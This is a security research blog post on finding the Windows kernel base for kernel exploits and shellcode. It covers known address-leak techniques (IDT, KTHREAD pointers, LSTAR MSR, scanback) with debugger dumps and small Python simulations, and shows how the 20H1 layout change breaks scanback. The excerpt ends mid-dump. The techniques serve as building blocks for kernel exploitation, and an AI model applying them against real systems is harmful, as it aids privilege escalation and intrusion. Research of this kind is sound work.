Finding the Base of the Windows Kernel

Recently-ish (~2020), Microsoft changed the way the kernel image is mapped and also some implementation details of hal.dll. The kernel changes have caused existing methods of finding the base of the kernel via shellcode or a leak and arbitrary read to crash. This obviously isn't great, so I decided to figure out a way around the issue to support some code I've been writing in my free time (maybe more on that later).

Our discussion is going to start at Windows 10 1903 and then move up through Windows 10 21H2. These changes are also still present in Windows 11.

What's the point(er)?

Finding the base of the kernel is important for kernel exploits and kernel shellcode. If you can find the base of the kernel you can look up functions inside of it via the export table in its PE header. Various functions inside of the kernel allow you to allocate memory, start threads, and resolve other kernel module bases via the PsLoadedModuleList. Without being able to utilize kernel routines and symbols, you're pretty limited in what you can do if you're executing in kernel. Hopefully this clarifies why this post is even necessary.

Literature Review: Existing Methods

In order to understand where I am going with all of this, we first need to look at what techniques are already out there. This is split up into three parts: how to get to the base of the kernel, obtaining ("leaking") a kernel address to be used to find the base, and how to do version detection in kernel.

Getting to Kernel Base

Two of these methods rely on having some kind of memory leak of a kernel address; one does not. They all have the same goal: to locate the base of the kernel.

All of these techniques apply to any PE file, not just the kernel.

NtQuerySystemInformation

The easiest and most version-independent way to get the base of the kernel and all other kernel modules is via NtQuerySystemInformation using the SystemModuleInformation (0xB) member of the SYSTEM_INFORMATION_CLASS enumeration. When queried (with an appropriate buffer size), the function will return a filled out SYSTEM_MODULE_INFORMATION structure that contains a DWORD for the number of modules present and then an anysize array of SYSTEM_MODULE structures representing the modules. Here's some C code that uses it to query driver names and bases. You can actually get the base addresses and names of every kernel module via some documented APIs too: EnumDeviceDrivers and GetDeviceDriverBaseNameA from the PSAPI can be used together to accomplish that. On the backend they use NtQuerySystemInformation with the SystemModuleInformation class. FYI, psapi is just a small stub around the API set DLL api-ms-win-core-psapi-l1-1-0.dll, which ends up forwarding to kernelbase.dll in all versions.

Figure: A portion of kernelbase!EnumDeviceDrivers showing a call to NtQuerySystemInformation

GetDeviceDriverBaseNameA calls the unexported kernel32!FindDeviceDriver function, which again calls NtQuerySystemInformation with the SystemModuleInformation class.
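To make the shape of that returned buffer a bit more concrete, here is a minimal Python sketch that walks a module list laid out the way SystemModuleInformation is commonly described for x64. The field layout (three pointers, two 32-bit values, four 16-bit values, and a 256-byte path per entry) is an assumption based on unofficial structure definitions, not something taken from this post, and the buffer is synthetic so the parser can run anywhere. The helper names are hypothetical.

```python
import struct

# Assumed x64 layout of one module entry (unofficial, not from this post):
#   Section, MappedBase, ImageBase                               : 3 x 8-byte pointers
#   ImageSize, Flags                                             : 2 x 4-byte integers
#   LoadOrderIndex, InitOrderIndex, LoadCount, OffsetToFileName  : 4 x 2-byte integers
#   FullPathName                                                 : 256-byte ANSI path
ENTRY = struct.Struct("<QQQIIHHHH256s")
HEADER_SIZE = 8  # 4-byte module count plus 4 bytes of alignment padding


def parse_module_list(buf):
    """Return (file name, image base, image size) for each module in buf."""
    (count,) = struct.unpack_from("<I", buf, 0)
    modules = []
    for i in range(count):
        fields = ENTRY.unpack_from(buf, HEADER_SIZE + i * ENTRY.size)
        image_base, image_size = fields[2], fields[3]
        name_offset, full_path = fields[8], fields[9]
        path = full_path.split(b"\x00", 1)[0]
        name = path[name_offset:].decode("ascii")
        modules.append((name, image_base, image_size))
    return modules


def build_fake_buffer(entries):
    """Build a synthetic buffer from (path, base, size) tuples for testing."""
    buf = struct.pack("<II", len(entries), 0)
    for path, base, size in entries:
        name_offset = path.rfind(b"\\") + 1
        buf += ENTRY.pack(0, 0, base, size, 0, 0, 0, 0, name_offset, path)
    return buf


if __name__ == "__main__":
    fake = build_fake_buffer(
        [(b"\\SystemRoot\\system32\\ntoskrnl.exe", 0xFFFFF8066E200000, 0x1046000)]
    )
    for name, base, size in parse_module_list(fake):
        print(f"{name}: base={base:#x} size={size:#x}")
```

On a real system the buffer would come from NtQuerySystemInformation itself; only the parsing step is sketched here.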

Scan Backwards

In the event we cannot get any information from user-mode or we are in a low-integrity process, then the scanback technique can be used. Basically, we need a memory leak or reliable way of getting a kernel address to get in the "ballpark" of the kernel image. See the next section on "leaking" kernel addresses for more details on that. Once we have an address somewhere in the kernel, we can scan backwards one page (0x1000 bytes) at a time until we get to the PE header of the kernel image. This trick relies on two major assumptions:

  1. PE images are page aligned
  2. The memory space between the leaked address and the base of the kernel is contiguously mapped

We will see later that #2 isn't true on newer versions of Windows.

Every PE file starts with the bytes MZ (0x5a4d). To see if we have reached the beginning of the PE file, we can check to see if the page starts with MZ. If it does not, keep scanning back. If it does, then you have (probably) found the base of the image. I recommend doing a little bit more validation than that, such as seeing if the suspected base address + IMAGE_DOS_HEADER.e_lfanew contains the bytes PE (0x4550).

If you're interested in a code implementation of this technique, here's some code from zerosum0x0.
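For a quick feel of the logic without touching a kernel, here is a small Python simulation of the scanback over a flat byte buffer. It is only a sketch: the buffer stands in for kernel memory, offsets stand in for addresses, and the function names are made up for illustration. Real shellcode would fault on an unmapped page, which a byte buffer cannot model.

```python
import struct

PAGE_SIZE = 0x1000
E_LFANEW_OFFSET = 0x3C  # offset of e_lfanew inside IMAGE_DOS_HEADER


def looks_like_pe(memory, offset):
    """Check for MZ at offset and the PE signature at offset + e_lfanew."""
    if memory[offset:offset + 2] != b"MZ":
        return False
    if offset + E_LFANEW_OFFSET + 4 > len(memory):
        return False
    (e_lfanew,) = struct.unpack_from("<I", memory, offset + E_LFANEW_OFFSET)
    pe = offset + e_lfanew
    # The full signature is four bytes: 'P', 'E', 0, 0.
    return memory[pe:pe + 4] == b"PE\x00\x00"


def scan_back(memory, leaked_offset):
    """Walk back one page at a time until a validated PE header is found."""
    page = leaked_offset & ~(PAGE_SIZE - 1)
    while page >= 0:
        if looks_like_pe(memory, page):
            return page
        page -= PAGE_SIZE
    return None


if __name__ == "__main__":
    memory = bytearray(0x5000)
    memory[0x2000:0x2002] = b"MZ"                     # real header
    struct.pack_into("<I", memory, 0x203C, 0xE8)      # e_lfanew
    memory[0x20E8:0x20EC] = b"PE\x00\x00"
    memory[0x3000:0x3002] = b"MZ"                     # decoy with no PE signature
    print(hex(scan_back(memory, 0x4ABC)))
```

The decoy page shows why checking MZ alone is not enough: the scan skips it because the PE signature check fails.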

Relative Virtual Address (RVA)

The lamest of the kernel base finding methods is just to hard code the Relative Virtual Address (RVA) of the leaked symbol into your shellcode or exploit. This requires knowing the exact version(s) your code will be running on ahead of time and also requires version detection to support multiple versions of the kernel.

A slight variation on this method is to use an exported symbol from the leaked module to calculate its base. You can open the image file in user-mode and then look up the exported symbol to get its offset from the base address. This can be accomplished with LoadLibraryA and GetProcAddress. You can also do manual PE parsing. However, loading something like the kernel image into a user-mode process is pretty suspicious. You'll also need a way to pass the calculated RVA into your exploit or shellcode.
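The arithmetic behind both variants is just a subtraction. As a worked example in Python, assume the leaked pointer is the kernel entry point and its RVA is 0x98D010 (the entry point RVA that shows up in the 20H2 header dump later in this post). The function name is hypothetical, and the page-alignment check is an extra sanity test resting on the assumption that PE images are page aligned.

```python
PAGE_MASK = 0xFFF


def base_from_leak(leaked_address, symbol_rva):
    """Compute an image base from a leaked symbol address and its known RVA."""
    base = leaked_address - symbol_rva
    if base & PAGE_MASK:
        # A misaligned result usually means the RVA belongs to another build.
        raise ValueError("computed base is not page aligned")
    return base


if __name__ == "__main__":
    leaked = 0xFFFFF8066EB8D010  # hypothetical leak: image base + 0x98D010
    print(hex(base_from_leak(leaked, 0x98D010)))
```

If the RVA comes from the wrong kernel build, the result will often (though not always) fail the alignment check, which is a cheap hint that version detection went wrong.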

"Leaking" Kernel Addresses

To get a kernel address from an exploit you usually have to have a memory leak (information disclosure). When you're already executing via shellcode you have more options, but you still need to find a pointer into the kernel or another module to utilize the techniques above.

KPCR

Each logical processor on a Windows system has an associated structure called the Kernel Processor Control Region (KPCR). The KPCR is a massive structure, coming in at 0xC000 bytes as of the Windows 11 Beta. The first 0x180 bytes are almost entirely consistent across versions. At offset 0x180 lies the nested Kernel Processor Control Block (KPRCB) structure, which is very large and the reason that the KPCR is as large as it is. Members are added when major features (like KVAS) are added to the OS.

On 64-bit Windows, the GS segment register points to the KPCR for that processor. The swapgs instruction at kernel entry points (such as the system call handler, KiSystemCall64[Shadow], and Interrupt Service Routines (ISRs)) causes the processor to swap the contents of Model Specific Register (MSR) 0xC0000101 (GSBASE) with MSR 0xC0000102 (KERNEL_GSBASE). GSBASE holds the base address used for GS-relative memory accesses. On 32-bit, 0x30 is explicitly loaded into FS at kernel entry points, and the GDT entry at offset 0x30 defines the base as the address of the KPCR for that processor.

Figure: swapgs at the 64-bit kernel entrypoint
Figure: Moving 0x30 into FS at the 32-bit kernel entrypoint

Both the upper members of the KPCR and the KPRCB have pointers into the kernel and other modules that might be of use while trying to calculate where exactly the kernel is located. The issue with the KPRCB is that fields change frequently, so the offset to a particular field of interest would be very version dependent.

Interrupt Descriptor Table

One classic and consistent place to find reliable pointers into the kernel in the KPCR is in the Interrupt Descriptor Table (IDT). The KPCR has a pointer to the IDT at offset 0x38, the IdtBase field. Dumping out quad words (with symbols) at that address gives some pointers into the kernel!

0: kd> dqs poi(@$pcr+38)+4
fffff802`35d8b004  fffff802`39448e00 nt!KiDebugServiceTrap+0x40
fffff802`35d8b00c  00102a40`00000000
fffff802`35d8b014  fffff802`39448e04 nt!KiDebugServiceTrap+0x44
fffff802`35d8b01c  00103040`00000000
fffff802`35d8b024  fffff802`39448e03 nt!KiDebugServiceTrap+0x43
fffff802`35d8b02c  001035c0`00000000
fffff802`35d8b034  fffff802`3944ee00 nt! ?? ::FNODOBFM::`string'+0x10
fffff802`35d8b03c  00103900`00000000
fffff802`35d8b044  fffff802`3944ee00 nt! ?? ::FNODOBFM::`string'+0x10
fffff802`35d8b04c  00103c40`00000000
fffff802`35d8b054  fffff802`39448e00 nt!KiDebugServiceTrap+0x40
fffff802`35d8b05c  00104180`00000000
fffff802`35d8b064  fffff802`39448e00 nt!KiDebugServiceTrap+0x40
fffff802`35d8b06c  00104680`00000000
fffff802`35d8b074  fffff802`39448e00 nt!KiDebugServiceTrap+0x40
fffff802`35d8b07c  00104a40`00000000

If you look a bit lower in the code from zerosum0x0 that I linked earlier you can see this is exactly the method being used to get a kernel address.
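One detail worth spelling out: on x64, each IDT gate is 16 bytes and the handler address is split into three pieces. Because the dump above starts at +4, the low 16 bits of each symbolized value are gate attribute bits (0x8e00 and friends) rather than address bits, which is still plenty close for a scanback. The Python sketch below reassembles the exact handler address for the second gate, using bytes read off the dump; the function name is made up for illustration.

```python
import struct

# x64 interrupt gate layout (16 bytes, little endian):
#   offset bits 15:0, segment selector, IST/type attributes,
#   offset bits 31:16, offset bits 63:32, reserved
GATE = struct.Struct("<HHHHII")


def idt_handler_address(entry):
    """Rebuild the 64-bit handler address from one 16-byte IDT gate."""
    offset_low, _selector, _attributes, offset_mid, offset_high, _reserved = GATE.unpack(entry)
    return (offset_high << 32) | (offset_mid << 16) | offset_low


# Second gate (fffff802`35d8b010) reconstructed from the dump above:
# low offset 0x2a40 and selector 0x0010 come from the qword at ...b00c,
# attributes 0x8e04 and the upper offset parts from the qword at ...b014.
SECOND_GATE = GATE.pack(0x2A40, 0x0010, 0x8E04, 0x3944, 0xFFFFF802, 0)

if __name__ == "__main__":
    print(hex(idt_handler_address(SECOND_GATE)))
```

Either value works as a starting point for finding the image, but the reassembled one is the actual handler entry point.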

KTHREAD Pointers

One of the fields in the KPRCB that is consistent across versions of the kernel is the CurrentThread field at offset 8. That puts it at offset 0x188 of the KPCR (x64). In fact, you'll see this offset repeatedly in the kernel, as this is what the kernel uses to get a pointer to the current thread running on the processor.

Figure: An example from nt!KiKernelSysretExit, which might look familiar from my KVAS post

If we dump pointers with symbols (dps) at the current thread over the size of KTHREAD, we can see many pointers into the kernel!

Pointers in KTHREAD (system thread)
0: kd> dps @$thread L@@C++(sizeof(nt!_KTHREAD)/8)
fffff802`39d4abc0  00000000`00200006
fffff802`39d4abc8  fffff802`39d4abc8 nt!KiInitialThread+0x8
fffff802`39d4abd0  fffff802`39d4abc8 nt!KiInitialThread+0x8
fffff802`39d4abd8  00000000`00000000
fffff802`39d4abe0  00000000`0791ddc0
fffff802`39d4abe8  fffff802`35d97c70
fffff802`39d4abf0  fffff802`35d92000
fffff802`39d4abf8  fffff802`35d98000
fffff802`39d4ac00  00000000`00000000
fffff802`39d4ac08  000000d2`4507715b
fffff802`39d4ac10  00000000`ffffffff
fffff802`39d4ac18  fffff802`35d97c00
fffff802`39d4ac20  fffff802`35d97cc0
fffff802`39d4ac28  00000000`00000000
fffff802`39d4ac30  00000409`00000100
fffff802`39d4ac38  00080000`00020044
fffff802`39d4ac40  00000000`00000000
fffff802`39d4ac48  00000000`00000000
fffff802`39d4ac50  00000000`00000000
fffff802`39d4ac58  fffff802`39d4ac58 nt!KiInitialThread+0x98
fffff802`39d4ac60  fffff802`39d4ac58 nt!KiInitialThread+0x98
fffff802`39d4ac68  fffff802`39d4ac68 nt!KiInitialThread+0xa8
fffff802`39d4ac70  fffff802`39d4ac68 nt!KiInitialThread+0xa8
fffff802`39d4ac78  ffffe70e`4e4a5040
fffff802`39d4ac80  00000000`00000000
fffff802`39d4ac88  00000000`00000000
fffff802`39d4ac90  00000000`00000000
fffff802`39d4ac98  00000000`00000000
fffff802`39d4aca0  00000000`00000000
fffff802`39d4aca8  00000000`00000000
fffff802`39d4acb0  00000000`00000000
fffff802`39d4acb8  00000000`00000000
fffff802`39d4acc0  00000000`00000008
fffff802`39d4acc8  fffff802`39d4ad90 nt!KiInitialThread+0x1d0
fffff802`39d4acd0  fffff802`39d4ad90 nt!KiInitialThread+0x1d0
fffff802`39d4acd8  00000000`00000000
fffff802`39d4ace0  00000000`00000000
fffff802`39d4ace8  00000000`00000000
fffff802`39d4acf0  6851f04c`965c27f1
fffff802`39d4acf8  00000000`00000000
fffff802`39d4ad00  00000000`00000000
fffff802`39d4ad08  00000000`00000000
fffff802`39d4ad10  00038a7a`00000401
fffff802`39d4ad18  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4ad20  ffffe70e`506fcd88
fffff802`39d4ad28  00000000`00000000
fffff802`39d4ad30  00000000`00000000
fffff802`39d4ad38  00000000`00000000
fffff802`39d4ad40  00020002`00000000
fffff802`39d4ad48  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4ad50  00000000`00000000
fffff802`39d4ad58  00000000`00000000
fffff802`39d4ad60  00000000`00000000
fffff802`39d4ad68  00000000`00000000
fffff802`39d4ad70  00014f81`00000000
fffff802`39d4ad78  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4ad80  00000000`00000000
fffff802`39d4ad88  00000000`00000000
fffff802`39d4ad90  fffff802`39d4acc8 nt!KiInitialThread+0x108
fffff802`39d4ad98  fffff802`39d4acc8 nt!KiInitialThread+0x108
fffff802`39d4ada0  00000000`01020401
fffff802`39d4ada8  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4adb0  00000000`00000000
fffff802`39d4adb8  00000000`00000000
fffff802`39d4adc0  00000000`00000000
fffff802`39d4adc8  00000000`00000000
fffff802`39d4add0  00000000`00000000
fffff802`39d4add8  00000000`00000000
fffff802`39d4ade0  fffff802`39d47ac0 nt!KiInitialProcess
fffff802`39d4ade8  fffff802`39d1db90 nt!KiBootProcessorIdleThreadUserAffinity
fffff802`39d4adf0  00000000`00000000
fffff802`39d4adf8  00000000`00000014
fffff802`39d4ae00  fffff802`39d21cc0 nt!KiBootProcessorIdleThreadAffinity
fffff802`39d4ae08  00000000`00010000
fffff802`39d4ae10  00000000`00000004
fffff802`39d4ae18  fffff802`39d4ae18 nt!KiInitialThread+0x258
fffff802`39d4ae20  fffff802`39d4ae18 nt!KiInitialThread+0x258
fffff802`39d4ae28  fffff802`39d4ae28 nt!KiInitialThread+0x268
fffff802`39d4ae30  fffff802`39d4ae28 nt!KiInitialThread+0x268
fffff802`39d4ae38  fffff802`39d47ac0 nt!KiInitialProcess
fffff802`39d4ae40  00000000`19000000
fffff802`39d4ae48  00006804`7f580012
fffff802`39d4ae50  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4ae58  00000000`00000000
fffff802`39d4ae60  00000000`00000000
fffff802`39d4ae68  fffff802`393b2170 nt!EmpCheckErrataList
fffff802`39d4ae70  fffff802`393b2170 nt!EmpCheckErrataList
fffff802`39d4ae78  fffff802`39337ac0 nt!KiSchedulerApc
fffff802`39d4ae80  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4ae88  00000000`00000000
fffff802`39d4ae90  00000000`00000000
fffff802`39d4ae98  00000000`00000000
fffff802`39d4aea0  00000001`00060000
fffff802`39d4aea8  fffff802`39d4aea8 nt!KiInitialThread+0x2e8
fffff802`39d4aeb0  fffff802`39d4aea8 nt!KiInitialThread+0x2e8
fffff802`39d4aeb8  ffffe70e`4e535378
fffff802`39d4aec0  fffff802`39d47af0 nt!KiInitialProcess+0x30
fffff802`39d4aec8  fffff802`39d4aec8 nt!KiInitialThread+0x308
fffff802`39d4aed0  fffff802`39d4aec8 nt!KiInitialThread+0x308
fffff802`39d4aed8  00000000`0000003f
...

Now for consistency's sake, I'm going to explicitly dump out the same information from a user-mode thread, cmd.exe in this case.

Pointers in KTHREAD (user thread)
0:kd> dps ffffe70e57dee0c0 L@@C++(sizeof(nt!_KTHREAD)/8)
ffffe70e`57dee0c0  00000000`00a00006
ffffe70e`57dee0c8  ffffe70e`57dee0c8
ffffe70e`57dee0d0  ffffe70e`57dee0c8
...
ffffe70e`57dee350  ffffe70e`57dee0c0
ffffe70e`57dee358  ffffe70e`552eaf50
ffffe70e`57dee360  ffffe70e`57dee158
ffffe70e`57dee368  fffff802`393b2170 nt!EmpCheckErrataList
ffffe70e`57dee370  fffff802`393b2170 nt!EmpCheckErrataList
ffffe70e`57dee378  fffff802`39337ac0 nt!KiSchedulerApc
ffffe70e`57dee380  ffffe70e`57dee0c0
ffffe70e`57dee388  00000000`00000000
...

The output was shortened in places that did not have kernel pointers. Notice there are only three kernel pointers in this thread! The two different functions and their offsets into KTHREAD are consistent between the system thread and the user thread. If you check any thread, you will find that these pointers are present. What are these three fields? The offset into KTHREAD to the first nt!EmpCheckErrataList pointer is 0x2a8 (0xffffe70e57dee368-0xffffe70e57dee0c0). Dumping out KTHREAD gives the answer!

0: kd> dt -v -r1 _KTHREAD @$thread
nt!_KTHREAD
struct _KTHREAD, 225 elements, 0x480 bytes
   +0x000 Header           : struct _DISPATCHER_HEADER, 59 elements, 0x18 bytes
...
   +0x288 SchedulerApc     : struct _KAPC, 19 elements, 0x58 bytes
      +0x000 Type             : 0x12 ''
      +0x001 AllFlags         : 0 ''
      +0x001 CallbackDataContext : Bitfield 0y0
      +0x001 Unused           : Bitfield 0y0000000 (0)
      +0x002 Size             : 0x58 'X'
      +0x003 SpareByte1       : 0x7f ''
      +0x004 SpareLong0       : 0x6804
      +0x008 Thread           : 0xfffff802`39d4abc0 struct _KTHREAD, 225 elements, 0x480 bytes
      +0x010 ApcListEntry     : struct _LIST_ENTRY, 2 elements, 0x10 bytes
 [ 0x00000000`00000000 - 0x00000000`00000000 ]
      +0x020 KernelRoutine    : 0xfffff802`393b2170        void  nt!EmpCheckErrataList+0
      +0x028 RundownRoutine   : 0xfffff802`393b2170        void  nt!EmpCheckErrataList+0
      +0x030 NormalRoutine    : 0xfffff802`39337ac0        void  nt!KiSchedulerApc+0
      +0x020 Reserved         : [3] 0xfffff802`393b2170 Void
      +0x038 NormalContext    : 0xfffff802`39d4abc0 Void
      +0x040 SystemArgument1  : (null) 
      +0x048 SystemArgument2  : (null) 
      +0x050 ApcStateIndex    : 0 ''
      +0x051 ApcMode          : 0 ''
      +0x052 Inserted         : 0 ''
   +0x288 SchedulerApcFill1 : [3]  "???"
   +0x28b QuantumReset     : 0x7f ''
   +0x288 SchedulerApcFill2 : [4]  "???"
   +0x28c KernelTime       : 0x6804
   +0x288 SchedulerApcFill3 : [64]  "???"
   +0x2c8 WaitPrcb         : (null) 
   +0x288 SchedulerApcFill4 : [72]  "???"
...
The dt WinDbg command has a lot of useful options. -v and -r (used above) show sizes for fields and recurse through nested structures, respectively. Check out the docs for more options and info!

The fields are the KernelRoutine, RundownRoutine, and NormalRoutine function pointers in the SchedulerApc member of KTHREAD. These offsets have been consistent since Windows 8 RTM, where the name of the field was changed from SuspendApc to SchedulerApc. Unfortunately, these function pointers seem to have been removed in Windows 10 21H1, probably to prevent this kind of disclosure. Of course, you can just go back to older versions to see their true use, since the fields themselves are still present in newer Windows versions.
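As a small illustration of the offsets involved, the Python sketch below pulls the three routine pointers out of a KTHREAD-sized byte buffer. The offsets (SchedulerApc at 0x288, KernelRoutine at +0x20 inside it) and the pointer values are taken from the dumps above; the buffer itself is synthetic and the function name is hypothetical. On builds where the pointers have been removed, the same read would not yield kernel addresses.

```python
import struct

KTHREAD_SIZE = 0x480           # from the dt output above
SCHEDULER_APC_OFFSET = 0x288   # KTHREAD.SchedulerApc
KERNEL_ROUTINE_OFFSET = 0x20   # KAPC.KernelRoutine; the other two follow it


def scheduler_apc_routines(kthread):
    """Return (KernelRoutine, RundownRoutine, NormalRoutine) from a KTHREAD image."""
    start = SCHEDULER_APC_OFFSET + KERNEL_ROUTINE_OFFSET  # 0x2a8
    return struct.unpack_from("<3Q", kthread, start)


if __name__ == "__main__":
    kthread = bytearray(KTHREAD_SIZE)
    struct.pack_into(
        "<3Q", kthread, 0x2A8,
        0xFFFFF802393B2170,  # nt!EmpCheckErrataList
        0xFFFFF802393B2170,  # nt!EmpCheckErrataList
        0xFFFFF80239337AC0,  # nt!KiSchedulerApc
    )
    for pointer in scheduler_apc_routines(kthread):
        print(hex(pointer))
```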

It's worth noting that I'm not the first one to discover this. Pages 20 and 21 of Morten Schenk's 2017 BlackHat briefing paper show that if you have a pointer to KTHREAD, then you can reliably get pointers into the kernel (hence why this is in the literature review section).

LSTAR MSR

When a syscall instruction is executed, the processor jumps to the address contained in the LSTAR Model Specific Register (MSR) (0xC0000082) after transitioning into kernel mode. This is not Windows specific behavior, as it is defined in the Intel Manual (Volume 2B, Chapter 4.3, SYSCALL). The system call handlers are unsurprisingly located in the kernel image, so if you can execute a rdmsr, you can get a pointer into the kernel. Of course this technique is only useful for shellcode or if you are somehow already executing in kernel.

With the introduction of KVAS, all of the kernel entry points were moved into a section in the kernel called KVASCODE. This section is present in both the user-mode and kernel-mode copies of the page tables. In kernels that have KVAS support, up to Windows 10 19H2, the KVASCODE section directly borders the .text section, so if you are able to get the address of a kernel entry point (such as the one in the LSTAR MSR), then you can use it as a starting point for a scanback.

Passing in from Userland

Of course, one foolproof technique you can use to get the base of the kernel into your kernel-mode payload is to pass the address in from user-mode. This assumes medium integrity execution in user-mode and will not help when you're dealing with a fully remote exploit.

Other Leaks

Talking about how more specific kernel memory leaks work is outside the scope of this post, but I will say that Microsoft very frequently patches kernel information disclosure bugs, so perhaps you can use my post about patch extraction and patch diffing to find and play with one :).

Version Detection in Kernel

Version detection can be accomplished by looking at the NtMajorVersion, NtMinorVersion, NtBuildNumber, and NtProductType fields of KUSER_SHARED_DATA, which is always located in the kernel at 0xFFDF0000 (32-bit) or 0xFFFFF78000000000 (64-bit). Microsoft recently randomized the writable version of this structure and a read-only mapping is located at the old static address. Information on that can be found on the MSRC blog and in this post by Connor McGarr.

Funnily enough, NtMajorVersion is still 10 on Windows 11.
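Here is a rough Python sketch of reading those four fields out of a copy of the KUSER_SHARED_DATA page. The field offsets (NtBuildNumber at 0x260, NtProductType at 0x264, NtMajorVersion at 0x26C, NtMinorVersion at 0x270) are assumptions taken from the public structure definition, not from this post, and the page contents here are synthetic. The function name is hypothetical.

```python
import struct

# Assumed field offsets inside KUSER_SHARED_DATA (from public headers).
NT_BUILD_NUMBER = 0x260
NT_PRODUCT_TYPE = 0x264
NT_MAJOR_VERSION = 0x26C
NT_MINOR_VERSION = 0x270


def read_version(shared_data):
    """Extract version fields from a byte copy of the shared data page."""
    def read_u32(offset):
        return struct.unpack_from("<I", shared_data, offset)[0]

    return {
        "major": read_u32(NT_MAJOR_VERSION),
        "minor": read_u32(NT_MINOR_VERSION),
        "build": read_u32(NT_BUILD_NUMBER),
        "product_type": read_u32(NT_PRODUCT_TYPE),
    }


if __name__ == "__main__":
    page = bytearray(0x1000)
    struct.pack_into("<I", page, NT_BUILD_NUMBER, 19044)  # Windows 10 21H2
    struct.pack_into("<I", page, NT_PRODUCT_TYPE, 1)      # workstation
    struct.pack_into("<I", page, NT_MAJOR_VERSION, 10)
    struct.pack_into("<I", page, NT_MINOR_VERSION, 0)
    print(read_version(page))
```

Since the major version does not distinguish Windows 10 from Windows 11, the build number is the field that actually separates releases.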

What Has Changed?

Now that we are all up to speed on what techniques are already out there, we need to take a look at what Microsoft has changed in the most recent versions of Windows that get in the way of some of these techniques and then how to work around these changes to make sure exploitation and/or execution can keep working on 20H1 and higher.

Kernel Mapping and Fake Headers

In kernel versions prior to 20H1, the .text section of the kernel binary bordered the top of the image. This means that it also bordered the PE header for the image. This fact is why it is possible to use the scanback technique from a pointer into the .text section. In kernel versions 20H1 and up, the .text section no longer borders the PE header. In fact, no code sections at all border the PE header. The .rdata (read-only data), .pdata (exception data), and .idata (import data) sections now border the PE header. Between .idata and the next readable section, PROTDATA, lie a few unmapped pages, and the .text section then starts at an offset of 0x200000 bytes from the base of the PE. Fortunately, .text and KVASCODE are contiguous with the sections in between them.

Figure: 19H2 kernel memory segments. The image starts with .text and it borders the top of the image
Figure: 20H2 kernel memory segments. The .text section and the base of the image are now non-contiguous

For the sake of validation, let's see if those pages are actually unmapped or if something is there. To do so, let's load up our trusty kernel debugger.

I'm just going to go back a few thousand bytes from the kernel's .text section into that gap and look over what is there, if anything.

0: kd> dc nt+200000-5000 L500
fffff806`6e3fb000  00000000 00000000 00002b00 72657355  .........+..User
fffff806`6e3fb010  68636143 746e4565 78457972 65726970  CacheEntryExpire
fffff806`6e3fb020  65754464 6f4c6f54 64656b63 73736553  dDueToLockedSess
fffff806`6e3fb030  006e6f69 00030b06 00000000 00000000  ion.............
fffff806`6e3fb040  55000032 43726573 65686361 72746e45  2..UserCacheEntr
fffff806`6e3fb050  70784579 64657269 54657544 536f4e6f  yExpiredDueToNoS
fffff806`6e3fb060  69737365 73416e6f 69636f73 6f697461  essionAssociatio
fffff806`6e3fb070  0b06006e 00000005 00000000 00720000  n.............r.
fffff806`6e3fb080  65735500 63614372 6e456568 53797274  .UserCacheEntryS
fffff806`6e3fb090  65746174 65706f00 69746172 6f436e6f  tate.operationCo
... boring, boring
fffff806`6e3fc000  00905a4d 00000003 00000004 0000ffff  MZ..............
fffff806`6e3fc010  000000b8 00000000 00000040 00000000  ........@.......
fffff806`6e3fc020  00000000 00000000 00000000 00000000  ................
fffff806`6e3fc030  00000000 00000000 00000000 000000e8  ................
fffff806`6e3fc040  0eba1f0e cd09b400 4c01b821 685421cd  ........!..L.!Th
fffff806`6e3fc050  70207369 72676f72 63206d61 6f6e6e61  is program canno
fffff806`6e3fc060  65622074 6e757220 206e6920 20534f44  t be run in DOS 
fffff806`6e3fc070  65646f6d 0a0d0d2e 00000024 00000000  mode....$.......

Well that looks interesting. It's a PE header... but to what?

0: kd> !dh fffff806`6e3fc000

File Type: DLL
FILE HEADER VALUES
     14C machine (i386)
       6 number of sections
2AB009D1 time date stamp Thu Sep 10 22:52:01 1992

       0 file pointer to symbol table
       0 number of symbols
      E0 size of optional header
    2102 characteristics
            Executable
            32 bit word machine
            DLL

OPTIONAL HEADER VALUES
     10B magic #
   14.20 linker version
   1A800 size of code
    4600 size of initialized data
       0 size of uninitialized data
    7370 address of entry point
    1000 base of code
         ----- new -----
0000000076570000 image base
    1000 section alignment
     200 file alignment
       3 subsystem (Windows CUI)
   10.00 operating system version
   10.00 image version
   10.00 subsystem version
   23000 size of image
     400 size of headers
   233EC checksum
0000000000040000 size of stack reserve
0000000000001000 size of stack commit
0000000000100000 size of heap reserve
0000000000001000 size of heap commit
    4540  DLL characteristics
            Dynamic base
            NX compatible
            No structured exception handler
            Guard
   11D80 [    99D3] address [size] of Export Directory
   1D364 [     154] address [size] of Import Directory
   20000 [     3D8] address [size] of Resource Directory
       0 [       0] address [size] of Exception Directory
   1EE00 [    2690] address [size] of Security Directory
   21000 [    1304] address [size] of Base Relocation Directory
    28E0 [      54] address [size] of Debug Directory
       0 [       0] address [size] of Description Directory
       0 [       0] address [size] of Special Directory
       0 [       0] address [size] of Thread Storage Directory
    1000 [      AC] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
   1D000 [     360] address [size] of Import Address Table Directory
    E0AC [     320] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory


SECTION HEADER #1
   .text name
   1A753 virtual size
    1000 virtual address
   1A800 size of raw data
     400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read


Debug Directories(3)
    Type       Size     Address  Pointer
    (   96)   60f01       d640f    a340f
    (1342988301)    300b       c1d01    b741d
    (4028183069)c015e017       a2619  10f0114

SECTION HEADER #2
   .data name
     4F4 virtual size
   1C000 virtual address
     200 size of raw data
   1AC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #3
  .idata name
    1D9A virtual size
   1D000 virtual address
    1E00 size of raw data
   1AE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         (no align specified)
         Read Only

SECTION HEADER #4
  .didat name
     8C4 virtual size
   1F000 virtual address
     A00 size of raw data
   1CC00 file pointer to raw data
